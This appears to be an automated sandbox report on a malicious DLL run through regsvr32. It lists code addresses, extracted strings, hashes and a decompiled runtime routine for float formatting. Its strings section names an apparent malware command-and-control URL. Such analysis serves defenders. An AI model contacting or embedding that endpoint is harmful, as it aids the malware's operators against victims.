0x6e41d176
0x6e41d182
0x6e41d18e
0x6e41d19a
0x6e41d1a6
0x6e41d1b2
0x6e41d1be
0x6e41d1ca
0x6e41d1d6
0x6e41d1e2
0x6e41d1eb
0x6e41d203
0x6e41d205
0x6e41d207
0x6e41d219
0x6e41d225
0x6e41d237
0x6e41d24f
0x6e41d25c
0x6e41d26e
0x6e41d281
0x6e41d216
0x6e41d216
0x6e41d28c
0x6e41d29f
0x6e41d2ad
0x6e41d2b6
0x6e41d2c2
0x6e41d2ce
0x6e41d2da
0x6e41d2e7
0x6e41d2f6
0x6e41d305
0x6e41d311
0x6e41d317
0x6e41d320
0x6e41d32c
0x6e41d341
0x6e41d34f
0x6e41d35d
0x6e41d363
0x6e41d375
0x6e41d381
0x6e41d393
0x6e41d3a1
0x6e41d395
0x6e41d395
0x6e41d395
0x6e41d3b1
0x6e41d3ba
0x00000000
0x00000000
0x6e41d3c9
0x6e41d3cc
0x6e41d3cf
0x6e41d3db
0x6e41d3e5
0x00000000
0x00000000
0x6e41d406
0x6e41d412
0x6e41d418
0x6e41d422
0x6e41d42a
0x6e41d436
0x6e41d43f
0x6e41d448
0x00000000
0x00000000
0x6e41d469
0x6e41d469
0x6e41d450
0x6e41d47b
0x00000000
0x6e41d4d7
0x6e41d48c
0x6e41d4a1
0x6e41d4c3
0x6e41d4cf
0x6e41d51c
0x6e41d522
0x6e41d530
0x6e41d53c
0x6e41d54a
0x6e41d55e
0x6e41d564
0x6e41d574
0x6e41d580
0x6e41d58d
0x6e41d59c
0x6e41d5ab
0x6e41d5b7
0x6e41d5bd
0x6e41d5c6
0x6e41d5d2
0x6e41d5e7
0x6e41d5f5
0x6e41d603
0x6e41d609
0x6e41d61b
0x6e41d627
0x6e41d639
0x6e41d647
0x6e41d63b
0x6e41d63b
0x6e41d63b
0x6e41d657
0x6e41d660
0x00000000
0x00000000
0x6e41d66f
0x6e41d672
0x6e41d675
0x6e41d681
0x6e41d68b
0x00000000
0x00000000
0x6e41d6ac
0x6e41d6b8
0x6e41d6be
0x6e41d6c8
0x6e41d6d0
0x6e41d6dc
0x6e41d6e5
0x6e41d6ee
0x00000000
0x00000000
0x6e41d70f
0x6e41d70f
0x6e41d6f6
0x6e41d721
0x00000000
0x6e41d77d
0x6e41d732
0x6e41d747
0x6e41d769
0x6e41d775
0x6e41d7c2
0x6e41d7c8
0x6e41d7d6
0x6e41d7e2
0x6e41d7f0
0x6e41d804
0x6e41d810
0x6e41d81c
0x6e41d828
0x6e41d835
0x6e41d844
0x6e41d853
0x6e41d85f
0x6e41d865
0x6e41d86e
0x6e41d87a
0x6e41d88f
0x6e41d89d
0x6e41d8ab
0x6e41d8b1
0x6e41d8c3
0x6e41d8cf
0x6e41d8e1
0x6e41d8ef
0x6e41d8e3
0x6e41d8e3
0x6e41d8e3
0x6e41d8ff
0x6e41d908
0x00000000
0x00000000
0x6e41d917
0x6e41d91a
0x6e41d91d
0x6e41d929
0x6e41d933
0x00000000
0x00000000
0x6e41d954
0x6e41d960
0x6e41d966
0x6e41d970
0x6e41d978
0x6e41d984
0x6e41d98d
0x6e41d996
0x00000000
0x00000000
0x6e41d9b7
0x6e41d9b7
0x6e41d99e
0x6e41d9c9
0x00000000
0x6e41da25
0x6e41d9da
0x6e41d9ef
0x6e41da11
0x6e41da1d
0x6e41da6a
0x6e41da70
0x6e41da7e
0x6e41da8a
0x6e41da98
0x6e41daac
0x6e41dab2
0x6e41dac2
0x6e41dace
0x6e41dada
0x6e41dae9
0x6e41daf8
0x6e41db04
0x6e41db0a
0x6e41db13
0x6e41db1f
0x6e41db34
0x6e41db42
0x6e41db50
0x6e41db56
0x6e41db68
0x6e41db74
0x6e41db86
0x6e41db94
0x6e41db88
0x6e41db88
0x6e41db88
0x6e41dba4
0x6e41dbad
0x00000000
0x00000000
0x6e41dbbc
0x6e41dbbf
0x6e41dbc2
0x6e41dbce
0x6e41dbd8
0x00000000
0x00000000
0x6e41dbf9
0x6e41dc05
0x6e41dc0b
0x6e41dc15
0x6e41dc1d
0x6e41dc29
0x6e41dc32
0x6e41dc3b
0x00000000
0x00000000
0x6e41dc5c
0x6e41dc5c
0x6e41dc43
0x6e41dc6e
0x00000000
0x6e41dcca
0x6e41dc7f
0x6e41dc94
0x6e41dcb6
0x6e41dcc2
0x6e41dd0f
0x6e41dd15
0x6e41dd23
0x6e41dd2f
0x6e41dd3d
0x6e41dd51
0x6e41dd5d
0x6e41dd65
0x6e41dd77
0x6e41dd7a
0x6e41dd8c
0x6e41dd98
0x6e41ddaa
0x6e41ddc1
0x6e41ddce
0x6e41dde0
0x6e41ddf3
0x6e41dd89
0x6e41dd89
0x6e41ddfe
0x6e41de11
0x6e41de1f
0x6e41de28
0x6e41de34
0x6e41de3c
0x6e41de4e
0x6e41de54
0x6e41de66
0x6e41de75
0x6e41de87
0x6e41dea1
0x6e41deb1
0x6e41dec3
0x6e41ded6
0x6e41de63
0x6e41de63
0x6e41dee4
0x6e41def7
0x6e41df05
0x6e41df11
0x6e41df1d
0x6e41df29
0x6e41df2f
0x6e41df39
0x00000000
0x6e41df4a
0x6e41dccf
0x6e41dcd5
0x6e41dce3
0x6e41dcef
0x6e41dcf5
0x6e41dcfd
0x6e41dd05
0x00000000
0x6e41dd05
0x6e41da2a
0x6e41da30
0x6e41da3e
0x6e41da4a
0x6e41da50
0x6e41da58
0x6e41da60
0x00000000
0x6e41da60
0x6e41d782
0x6e41d788
0x6e41d796
0x6e41d7a2
0x6e41d7a8
0x6e41d7b0
0x6e41d7b8
0x00000000
0x6e41d7b8
0x6e41d4dc
0x6e41d4e2
0x6e41d4f0
0x6e41d4fc
0x6e41d502
0x6e41d50a
0x6e41d512
0x00000000
0x6e41d512
0x6e41d0c6
0x6e41d0cc
0x6e41d0da
0x6e41d0e6
0x6e41d0ec
0x6e41d0f4
0x6e41d0fc
0x00000000
0x6e41d0fc
0x6e41bac0
0x6e41bac6
0x6e41bacf
0x6e41bada
0x6e41bae6
0x6e41baf2
0x6e41bafe
0x6e41bb0a
0x6e41bb16
0x6e41bb22
0x6e41bb2b
0x6e41bb38
0x6e41bb44
0x6e41bb50
0x6e41bb5c
0x6e41bb69
0x6e41bb70
0x6e41bb8b
0x6e41bb9a
0x6e41bbaf
0x6e41bbc7
0x6e41bbd4
0x6e41bbe9
0x6e41bbfc
0x6e41bb85
0x6e41bb85
0x6e41bc0a
0x6e41bc1d
0x6e41bc2b
0x6e41bc34
0x6e41bc40
0x6e41bc4c
0x6e41bc58
0x6e41bc65
0x6e41bc74
0x6e41bc83
0x6e41bc8f
0x6e41bc95
0x6e41bc9e
0x6e41bcaa
0x6e41bcbf
0x6e41bccd
0x6e41bcdb
0x6e41bce1
0x6e41bcf3
0x6e41bcff
0x6e41bd11
0x6e41bd1f
0x6e41bd13
0x6e41bd13
0x6e41bd13
0x6e41bd2f
0x6e41bd38
0x6e41bd47
0x6e41bd4d
0x6e41bd53
0x6e41bd62
0x6e41bd6f
0x00000000
0x00000000
0x6e41bd93
0x6e41bd9f
0x6e41bda5
0x6e41bdaf
0x6e41bdb7
0x6e41bdc3
0x6e41bdcc
0x6e41bdd5
0x00000000
0x00000000
0x6e41bdf6
0x6e41bdf6
0x6e41bddd
0x6e41be08
0x00000000
0x6e41be67
0x6e41be19
0x6e41be2e
0x6e41be53
0x6e41be5f
0x6e41beac
0x6e41beb2
0x6e41bec0
0x6e41becc
0x6e41beda
0x6e41beee
0x6e41bef6
0x6e41befc
0x6e41bf05
0x6e41bf10
0x6e41bf1c
0x6e41bf28
0x6e41bf34
0x6e41bf40
0x6e41bf4c
0x6e41bf58
0x6e41bf64
0x6e41bf70
0x6e41bf7c
0x6e41bf88
0x6e41bf91
0x6e41bfa9
0x6e41bfab
0x6e41bfad
0x6e41bfc8
0x6e41bfd7
0x6e41bfec
0x6e41c004
0x6e41c011
0x6e41c026
0x6e41c039
0x6e41bfc2
0x6e41bfc2
0x6e41c047
0x6e41c05a
0x6e41c068
0x6e41c071
0x6e41c07d
0x6e41c089
0x6e41c095
0x6e41c0a2
0x6e41c0b1
0x6e41c0c0
0x6e41c0cc
0x6e41c0d2
0x6e41c0db
0x6e41c0e7
0x6e41c0fc
0x6e41c10a
0x6e41c118
0x6e41c11e
0x6e41c130
0x6e41c13c
0x6e41c14e
0x6e41c15c
0x6e41c150
0x6e41c150
0x6e41c150
0x6e41c16c
0x6e41c175
0x00000000
0x00000000
0x6e41c184
0x6e41c18a
0x6e41c190
0x6e41c19f
0x6e41c1ac
0x00000000
0x00000000
0x6e41c1d0
0x6e41c1dc
0x6e41c1e2
0x6e41c1ec
0x6e41c1f4
0x6e41c200
0x6e41c209
0x6e41c212
0x00000000
0x00000000
0x6e41c233
0x6e41c233
0x6e41c21a
0x6e41c245
0x00000000
0x6e41c2a4
0x6e41c256
0x6e41c26b
0x6e41c290
0x6e41c29c
0x6e41c2e9
0x6e41c2ef
0x6e41c2fd
0x6e41c309
0x6e41c317
0x6e41c32b
0x6e41c331
0x6e41c341
0x6e41c34d
0x6e41c359
0x6e41c368
0x6e41c377
0x6e41c383
0x6e41c389
0x6e41c392
0x6e41c39e
0x6e41c3b3
0x6e41c3c1
0x6e41c3cf
0x6e41c3d5
0x6e41c3e7
0x6e41c3f3
0x6e41c405
0x6e41c413
0x6e41c407
0x6e41c407
0x6e41c407
0x6e41c423
0x6e41c42c
0x00000000
0x00000000
0x6e41c43b
0x6e41c441
0x6e41c447
0x6e41c456
0x6e41c463
0x00000000
0x00000000
0x6e41c487
0x6e41c493
0x6e41c499
0x6e41c4a3
0x6e41c4ab
0x6e41c4b7
0x6e41c4c0
0x6e41c4c9
0x00000000
0x00000000
0x6e41c4ea
0x6e41c4ea
0x6e41c4d1
0x6e41c4fc
0x00000000
0x6e41c55b
0x6e41c50d
0x6e41c522
0x6e41c547
0x6e41c553
0x6e41c5a0
0x6e41c5a6
0x6e41c5b4
0x6e41c5c0
0x6e41c5ce
0x6e41c5e2
0x6e41c5ee
0x6e41c5fa
0x6e41c606
0x6e41c613
0x6e41c622
0x6e41c631
0x6e41c63d
0x6e41c643
0x6e41c64c
0x6e41c658
0x6e41c66d
0x6e41c67b
0x6e41c689
0x6e41c68f
0x6e41c6a1
0x6e41c6ad
0x6e41c6bf
0x6e41c6cd
0x6e41c6c1
0x6e41c6c1
0x6e41c6c1
0x6e41c6dd
0x6e41c6e6
0x00000000
0x00000000
0x6e41c6f5
0x6e41c6f8
0x6e41c6fb
0x6e41c707
0x6e41c711
0x00000000
0x00000000
0x6e41c732
0x6e41c73e
0x6e41c744
0x6e41c74e
0x6e41c756
0x6e41c762
0x6e41c76b
0x6e41c774
0x00000000
0x00000000
0x6e41c795
0x6e41c795
0x6e41c77c
0x6e41c7a7
0x00000000
0x6e41c803
0x6e41c7b8
0x6e41c7cd
0x6e41c7ef
0x6e41c7fb
0x6e41c848
0x6e41c84e
0x6e41c85c
0x6e41c868
0x6e41c876
0x6e41c88a
0x6e41c890
0x6e41c8a0
0x6e41c8ac
0x6e41c8b8
0x6e41c8c7
0x6e41c8d6
0x6e41c8e2
0x6e41c8e8
0x6e41c8f1
0x6e41c8fd
0x6e41c912
0x6e41c920
0x6e41c92e
0x6e41c934
0x6e41c946
0x6e41c952
0x6e41c964
0x6e41c972
0x6e41c966
0x6e41c966
0x6e41c966
0x6e41c982
0x6e41c98b
0x00000000
0x00000000
0x6e41c99a
0x6e41c99d
0x6e41c9a0
0x6e41c9ac
0x6e41c9b6
0x00000000
0x00000000
0x6e41c9d7
0x6e41c9e3
0x6e41c9e9
0x6e41c9f3
0x6e41c9fb
0x6e41ca07
0x6e41ca10
0x6e41ca19
0x00000000
0x00000000
0x6e41ca3a
0x6e41ca3a
0x6e41ca21
0x6e41ca4c
0x00000000
0x6e41caa8
0x6e41ca5d
0x6e41ca72
0x6e41ca94
0x6e41caa0
0x6e41caed
0x6e41caf3
0x6e41cb01
0x6e41cb0d
0x6e41cb1b
0x6e41cb2f
0x6e41cb3b
0x6e41cb43
0x6e41cb55
0x6e41cb58
0x6e41cb6a
0x6e41cb76
0x6e41cb88
0x6e41cb9f
0x6e41cbac
0x6e41cbbe
0x6e41cbd1
0x6e41cb67
0x6e41cb67
0x6e41cbdc
0x6e41cbef
0x6e41cbfd
0x6e41cc06
0x6e41cc12
0x6e41cc1a
0x6e41cc2c
0x6e41cc2f
0x6e41cc41
0x6e41cc4d
0x6e41cc5f
0x6e41cc76
0x6e41cc83
0x6e41cc95
0x6e41cca8
0x6e41cc3e
0x6e41cc3e
0x6e41ccb3
0x6e41ccc6
0x6e41ccd4
0x6e41ccdd
0x6e41cce9
0x6e41ccf5
0x6e41ccfb
0x6e41cd05
0x00000000
0x6e41cd16
0x6e41caad
0x6e41cab3
0x6e41cac1
0x6e41cacd
0x6e41cad3
0x6e41cadb
0x6e41cae3
0x00000000
0x6e41cae3
0x6e41c808
0x6e41c80e
0x6e41c81c
0x6e41c828
0x6e41c82e
0x6e41c836
0x6e41c83e
0x00000000
0x6e41c83e
0x6e41c560
0x6e41c566
0x6e41c574
0x6e41c580
0x6e41c586
0x6e41c58e
0x6e41c596
0x00000000
0x6e41c596
0x6e41c2a9
0x6e41c2af
0x6e41c2bd
0x6e41c2c9
0x6e41c2cf
0x6e41c2d7
0x6e41c2df
0x00000000
0x6e41c2df
0x6e41bd4d
0x6e41be6c
0x6e41be72
0x6e41be80
0x6e41be8c
0x6e41be92
0x6e41be9a
0x6e41bea2
0x00000000
0x6e41bea2
0x00000000
0x6e41b9b7
0x6e41b8fc
0x6e41ba1b
0x6e41ba21
0x6e41ba2f
0x6e41ba3b
0x6e41ba41
0x6e41ba49
0x6e41ba51
0x00000000
0x6e41ba51
0x00000000
0x6e41b5c0
0x6e41b505
0x6e41b624
0x6e41b62a
0x6e41b638
0x6e41b644
0x6e41b64a
0x6e41b652
0x6e41b65a
0x00000000
0x6e41b65a
0x00000000
0x6e41b2fe
0x6e41b243
0x6e41b362
0x6e41b368
0x6e41b376
0x6e41b382
0x6e41b388
0x6e41b390
0x6e41b398
0x00000000
0x6e41b398
0x00000000
0x6e41b047
0x6e41af8c
0x6e41b0ab
0x6e41b0b1
0x6e41b0bf
0x6e41b0cb
0x6e41b0d1
0x6e41b0d9
0x6e41b0e1
0x00000000

Strings

https://telemetrysystemcollection.com/m8YYdu/mCQ2U9/auth.aspx, xrefs: 6E41BAB0
,KGn, xrefs: 6E41CD2C
\, xrefs: 6E41CD47
@, xrefs: 6E41BAC6
Kernel32.dll, xrefs: 6E41AB06, 6E41AC2F, 6E41AD58
&, xrefs: 6E41BEFC

Memory Dump Source

Source File: 0000000C.00000002.1160881545.000000006E411000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E410000, based on PE: true

Associated: 0000000C.00000002.1160866965.000000006E410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1160998743.000000006E46C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161008297.000000006E474000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161014163.000000006E476000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6e410000_regsvr32.jbxd

Similarity

API ID:
String ID: &$,KGn$@$Kernel32.dll$\$https://telemetrysystemcollection.com/m8YYdu/mCQ2U9/auth.aspx
API String ID: 0-1268192798
Opcode ID: c6b7ac7f30732d2a6c9030f859217ddeb929de6b75159ac076676c2a2b037ea1
Instruction ID: 5a773fc2e84d9cb695cd610a086e7d425c4f7df1df30a11639b1fd832070b24c
Opcode Fuzzy Hash: c6b7ac7f30732d2a6c9030f859217ddeb929de6b75159ac076676c2a2b037ea1
Instruction Fuzzy Hash: 3E739EB4E092698FDB64CF69C890BE9BBB1BF89304F1081DAD54DA7355DB306A81CF44

Uniqueness

Uniqueness Score: -1.00%

Function 6E4662FA Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1427
COMMONCrypto

Download Yara Rule

C-Code - Quality: 70%

			E6E4662FA(void* __ebx, signed int __edx, void* __edi, void* __esi, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, signed int _a16, signed int _a20, intOrPtr _a24) {
				signed int _v8;
				signed int _v464;
				void _v468;
				signed int _v472;
				char _v932;
				signed int _v936;
				signed int _v1392;
				signed int _v1396;
				signed int _v1400;
				char _v1860;
				signed int _v1864;
				signed int _v1868;
				signed int _v1872;
				signed int _v1876;
				signed int _v1880;
				signed int _v1884;
				intOrPtr _v1888;
				signed int _v1892;
				signed int _v1896;
				signed int _v1900;
				signed int _v1904;
				signed int _v1908;
				signed int _v1912;
				signed int _v1916;
				signed int _v1920;
				signed int _v1928;
				char _v1932;
				signed int _v1940;
				signed int _v1944;
				char _v2404;
				signed int _v2408;
				signed int _t792;
				intOrPtr _t802;
				signed int _t809;
				signed int _t810;
				signed int _t811;
				signed int _t820;
				signed int _t822;
				signed int _t829;
				void* _t833;
				signed int _t834;
				intOrPtr _t840;
				void* _t841;
				signed int _t847;
				signed int _t852;
				signed int _t853;
				signed int _t854;
				signed int _t857;
				signed int _t859;
				signed int _t861;
				signed int _t862;
				signed int _t864;
				signed int _t865;
				signed int _t866;
				signed int _t871;
				signed int _t874;
				signed int _t877;
				signed int _t883;
				signed int _t884;
				signed int _t892;
				signed int _t895;
				signed int _t900;
				char* _t903;
				signed int _t907;
				signed int _t918;
				signed int _t919;
				signed int _t920;
				signed int _t921;
				char* _t922;
				signed char _t925;
				signed int _t931;
				signed int _t933;
				signed int _t937;
				signed int _t940;
				signed int _t948;
				signed int _t951;
				signed int _t953;
				signed int _t956;
				signed int _t965;
				signed int _t966;
				signed int _t969;
				signed int _t982;
				signed int _t983;
				signed int _t984;
				signed int _t985;
				signed int* _t986;
				signed char _t989;
				signed int* _t992;
				signed int _t995;
				signed int _t997;
				signed int _t1001;
				signed int _t1004;
				signed int _t1012;
				signed int _t1015;
				signed int _t1018;
				signed int _t1021;
				signed int _t1030;
				intOrPtr _t1035;
				signed int _t1036;
				signed int _t1042;
				void* _t1050;
				signed int _t1051;
				signed int _t1052;
				signed int _t1053;
				signed int _t1056;
				signed int _t1064;
				signed int _t1068;
				signed int _t1070;
				signed int _t1075;
				void* _t1081;
				signed int _t1082;
				signed int _t1083;
				signed int _t1084;
				signed int _t1087;
				signed int _t1092;
				signed int _t1093;
				signed int _t1097;
				signed int _t1099;
				signed int _t1104;
				signed char _t1111;
				void* _t1112;
				signed int _t1117;
				intOrPtr* _t1124;
				signed int _t1133;
				signed int _t1134;
				void* _t1136;
				signed int _t1139;
				signed int _t1141;
				signed int _t1142;
				signed int _t1143;
				signed int _t1146;
				signed int _t1150;
				signed int _t1151;
				signed int _t1152;
				signed int _t1154;
				signed int _t1155;
				signed int _t1156;
				signed int _t1158;
				signed int _t1159;
				signed int _t1160;
				signed int _t1161;
				signed int _t1163;
				signed int _t1164;
				signed int _t1165;
				signed int _t1167;
				signed int _t1168;
				unsigned int _t1169;
				unsigned int _t1173;
				unsigned int _t1176;
				signed int _t1177;
				signed int _t1180;
				signed int* _t1183;
				signed int _t1186;
				void* _t1188;
				unsigned int _t1189;
				signed int _t1190;
				signed int _t1193;
				signed int* _t1196;
				signed int _t1199;
				signed int _t1202;
				signed int _t1203;
				signed int _t1204;
				signed int _t1205;
				signed int _t1208;
				signed int _t1213;
				signed int _t1214;
				signed int _t1216;
				signed int _t1217;
				signed int _t1218;
				signed int _t1219;
				signed int _t1220;
				signed int _t1221;
				signed int _t1222;
				signed int _t1224;
				signed int _t1226;
				signed int _t1227;
				signed int _t1228;
				signed int _t1229;
				signed int _t1230;
				signed int _t1232;
				void* _t1233;
				signed int _t1234;
				signed int _t1236;
				signed int _t1241;
				void* _t1245;
				intOrPtr _t1246;
				void* _t1247;
				void* _t1250;
				unsigned int _t1253;
				signed int _t1254;
				signed int _t1255;
				signed int _t1256;
				signed int _t1257;
				signed int _t1258;
				signed int _t1259;
				signed int _t1262;
				signed int _t1263;
				signed int _t1264;
				signed int _t1265;
				signed int _t1268;
				signed int _t1269;
				signed int _t1270;
				void* _t1271;
				void* _t1274;
				signed int _t1276;
				signed int _t1280;
				signed int _t1282;
				signed int _t1286;
				void* _t1287;
				signed int _t1288;
				void* _t1289;
				signed int _t1291;
				signed int _t1292;
				signed int _t1294;
				void* _t1297;
				signed int _t1299;
				signed int _t1300;
				signed int _t1302;
				signed int _t1303;
				signed int _t1305;
				signed int _t1313;
				signed int _t1315;
				void* _t1316;
				signed int* _t1317;
				signed int* _t1321;
				signed int _t1324;
				signed int _t1333;

				_t1287 = __esi;
				_t1245 = __edi;
				_t1202 = __edx;
				_t1313 = _t1315;
				_t1316 = _t1315 - 0x964;
				_t792 =  *0x6e474024; // 0xb68207cc
				_v8 = _t792 ^ _t1313;
				_v1928 = _a16;
				_v1896 = _a20;
				_push(__ebx);
				E6E468A13(__eflags,  &_v1940);
				_t1111 = 1;
				if((_v1940 & 0x0000001f) != 0x1f) {
					E6E468A7B(__eflags,  &_v1940);
					_v1932 = 1;
				} else {
					_v1932 = 0;
				}
				_push(_t1287);
				_t1288 = _a8;
				_push(_t1245);
				_t1246 = 0x20;
				_t1324 = _t1288;
				if(_t1324 > 0 || _t1324 >= 0 && _a4 >= 0) {
					_t802 = _t1246;
				} else {
					_t802 = 0x2d;
				}
				_t1124 = _v1928;
				 *_t1124 = _t802;
				 *((intOrPtr*)(_t1124 + 8)) = _v1896;
				E6E4689B4( &_v1944, 0, 0);
				_t1317 = _t1316 + 0xc;
				if((_t1288 & 0x7ff00000) != 0) {
					L14:
					_t809 = E6E461EF2( &_a4);
					_pop(_t1127);
					__eflags = _t809;
					if(_t809 != 0) {
						_t1127 = _v1928;
						 *((intOrPtr*)(_v1928 + 4)) = _t1111;
					}
					_t810 = _t809 - 1;
					__eflags = _t810;
					if(_t810 == 0) {
						_t811 = E6E460381(_v1896, _a24, "1#INF");
						__eflags = _t811;
						if(_t811 != 0) {
							goto L311;
						} else {
							_t1111 = 0;
							__eflags = 0;
							goto L308;
						}
					} else {
						_t820 = _t810 - 1;
						__eflags = _t820;
						if(_t820 == 0) {
							_push("1#QNAN");
							goto L12;
						} else {
							_t822 = _t820 - 1;
							__eflags = _t822;
							if(_t822 == 0) {
								_push("1#SNAN");
								goto L12;
							} else {
								__eflags = _t822 == 1;
								if(_t822 == 1) {
									_push("1#IND");
									goto L12;
								} else {
									_v1920 = _v1920 & 0x00000000;
									_a8 = _t1288 & 0x7fffffff;
									_t1333 = _a4;
									asm("fst qword [ebp-0x75c]");
									_t1291 = _v1884;
									_v1916 = _a12 + 1;
									_t1133 = _t1291 >> 0x14;
									_t829 = _t1133 & 0x000007ff;
									__eflags = _t829;
									if(_t829 != 0) {
										_t829 = 0;
										_t1203 = 0x100000;
										_t39 =  &_v1876;
										 *_t39 = _v1876 & 0;
										__eflags =  *_t39;
									} else {
										_t1203 = 0;
										_v1876 = _t1111;
									}
									_t1292 = _t1291 & 0x000fffff;
									_v1912 = _v1888 + _t829;
									asm("adc esi, edx");
									_t1134 = _t1133 & 0x000007ff;
									_v1868 = _v1876 + _t1134;
									E6E468AD0(_t1134, _t1333);
									_push(_t1134);
									 *_t1317 = _t1333;
									_t833 = E6E468BE0(_t1134);
									_t1136 = _t1134;
									_t834 = L6E46AC10(_t833, _t1111, _t1136, _t1203);
									_v1904 = _t834;
									_t1250 = 0x20;
									__eflags = _t834 - 0x7fffffff;
									if(_t834 == 0x7fffffff) {
										L25:
										__eflags = 0;
										_v1904 = 0;
									} else {
										__eflags = _t834 - 0x80000000;
										if(_t834 == 0x80000000) {
											goto L25;
										}
									}
									_t1204 = _v1868;
									__eflags = _t1292;
									_v468 = _v1912;
									_v464 = _t1292;
									_t1139 = (0 | _t1292 != 0x00000000) + 1;
									_v1892 = _t1139;
									_v472 = _t1139;
									__eflags = _t1204 - 0x433;
									if(_t1204 < 0x433) {
										__eflags = _t1204 - 0x35;
										if(_t1204 == 0x35) {
											L96:
											__eflags = _t1292;
											_t209 =  &_v1884;
											 *_t209 = _v1884 & 0x00000000;
											__eflags =  *_t209;
											_t840 =  *((intOrPtr*)(_t1313 + 4 + (0 | _t1292 != 0x00000000) * 4 - 0x1d4));
											asm("bsr eax, eax");
											if( *_t209 == 0) {
												_t841 = 0;
												__eflags = 0;
											} else {
												_t841 = _t840 + 1;
											}
											__eflags = _t1250 - _t841 - _t1111;
											asm("sbb esi, esi");
											_t1294 =  ~_t1292 + _t1139;
											__eflags = _t1294 - 0x73;
											if(_t1294 <= 0x73) {
												_t1205 = _t1294 - 1;
												__eflags = _t1205 - 0xffffffff;
												if(_t1205 != 0xffffffff) {
													_t1271 = _t1205 - 1;
													while(1) {
														__eflags = _t1205 - _t1139;
														if(_t1205 >= _t1139) {
															_t1030 = 0;
															__eflags = 0;
														} else {
															_t1030 =  *(_t1313 + _t1205 * 4 - 0x1d0);
														}
														__eflags = _t1271 - _t1139;
														if(_t1271 >= _t1139) {
															_t1169 = 0;
															__eflags = 0;
														} else {
															_t1169 =  *(_t1313 + _t1205 * 4 - 0x1d4);
														}
														 *(_t1313 + _t1205 * 4 - 0x1d0) = _t1169 >> 0x0000001f | _t1030 + _t1030;
														_t1205 = _t1205 - 1;
														_t1271 = _t1271 - 1;
														__eflags = _t1205 - 0xffffffff;
														if(_t1205 == 0xffffffff) {
															goto L111;
														}
														_t1139 = _v472;
													}
												}
												L111:
												_v472 = _t1294;
											} else {
												_v1400 = _v1400 & 0x00000000;
												_v472 = _v472 & 0x00000000;
												E6E463CE9( &_v468, 0x1cc,  &_v1396, 0);
												_t1317 =  &(_t1317[4]);
											}
											_t1253 = 0x434 >> 5;
											E6E45B880(0x434 >> 5,  &_v1396, 0, 0x434);
											__eflags = 1;
											 *(_t1313 + 0xbad63d) = 1 << (0x00000434 - _v1868 & 0x0000001f);
										} else {
											_v1396 = _v1396 & 0x00000000;
											_v1392 = 0x100000;
											_v1400 = 2;
											__eflags = _t1292;
											if(_t1292 != 0) {
												_t1233 = 0;
												__eflags = 0;
												while(1) {
													_t1035 =  *((intOrPtr*)(_t1313 + _t1233 - 0x570));
													__eflags = _t1035 -  *((intOrPtr*)(_t1313 + _t1233 - 0x1d0));
													if(_t1035 !=  *((intOrPtr*)(_t1313 + _t1233 - 0x1d0))) {
														goto L96;
													}
													_t1233 = _t1233 + 4;
													__eflags = _t1233 - 8;
													if(_t1233 != 8) {
														continue;
													} else {
														__eflags = 0;
														asm("bsr eax, esi");
														_v1884 = 0;
														if(0 == 0) {
															_t1036 = 0;
														} else {
															_t1036 = _t1035 + 1;
														}
														__eflags = _t1250 - _t1036 - 2;
														asm("sbb esi, esi");
														_t1305 =  ~_t1292 + _t1139;
														__eflags = _t1305 - 0x73;
														if(_t1305 <= 0x73) {
															_t1234 = _t1305 - 1;
															__eflags = _t1234 - 0xffffffff;
															if(_t1234 != 0xffffffff) {
																_t1274 = _t1234 - 1;
																while(1) {
																	__eflags = _t1234 - _t1139;
																	if(_t1234 >= _t1139) {
																		_t1042 = 0;
																	} else {
																		_t1042 =  *(_t1313 + _t1234 * 4 - 0x1d0);
																	}
																	__eflags = _t1274 - _t1139;
																	if(_t1274 >= _t1139) {
																		_t1173 = 0;
																	} else {
																		_t1173 =  *(_t1313 + _t1234 * 4 - 0x1d4);
																	}
																	 *(_t1313 + _t1234 * 4 - 0x1d0) = _t1173 >> 0x0000001e | _t1042 << 0x00000002;
																	_t1234 = _t1234 - 1;
																	_t1274 = _t1274 - 1;
																	__eflags = _t1234 - 0xffffffff;
																	if(_t1234 == 0xffffffff) {
																		goto L94;
																	}
																	_t1139 = _v472;
																}
															}
															L94:
															_v472 = _t1305;
														} else {
															_v1400 = 0;
															_v472 = 0;
															E6E463CE9( &_v468, 0x1cc,  &_v1396, 0);
															_t1317 =  &(_t1317[4]);
														}
														_t1253 = 0x435 >> 5;
														E6E45B880(0x435 >> 5,  &_v1396, 0, 0x435);
														 *(_t1313 + 0xbad63d) = 1 << (0x00000435 - _v1868 & 0x0000001f);
													}
													goto L113;
												}
											}
											goto L96;
										}
										L113:
										_t847 = _t1253 + 1;
										_t1297 = 0x1cc;
										_v1400 = _t847;
										_v936 = _t847;
										E6E463CE9( &_v932, 0x1cc,  &_v1396, _t847 << 2);
										_t1321 =  &(_t1317[7]);
										_t1111 = 1;
										__eflags = 1;
									} else {
										_v1396 = _v1396 & 0x00000000;
										_v1392 = 0x100000;
										_v1400 = 2;
										__eflags = _t1292;
										if(_t1292 == 0) {
											L53:
											_t1176 = _t1204 - 0x432;
											_t1177 = _t1176 & 0x0000001f;
											_v1900 = _t1176 >> 5;
											_v1876 = _t1177;
											_v1920 = _t1250 - _t1177;
											_t1050 = E6E46ABF0(_t1111, _t1250 - _t1177, 0);
											_t1236 = _v1892;
											_t1051 = _t1050 - 1;
											_t128 =  &_v1872;
											 *_t128 = _v1872 & 0x00000000;
											__eflags =  *_t128;
											_v1912 = _t1051;
											_t1052 =  !_t1051;
											_v1884 = _t1052;
											asm("bsr eax, ecx");
											if( *_t128 == 0) {
												_t136 =  &_v1880;
												 *_t136 = _v1880 & 0x00000000;
												__eflags =  *_t136;
											} else {
												_v1880 = _t1052 + 1;
											}
											_t1180 = _v1900;
											_t1297 = 0x1cc;
											_t1053 = _t1236 + _t1180;
											__eflags = _t1053 - 0x73;
											if(_t1053 <= 0x73) {
												__eflags = _t1250 - _v1880 - _v1876;
												asm("sbb eax, eax");
												_t1056 =  ~_t1053 + _t1236 + _t1180;
												_v1908 = _t1056;
												__eflags = _t1056 - 0x73;
												if(_t1056 > 0x73) {
													goto L57;
												} else {
													_t1276 = _t1180 - 1;
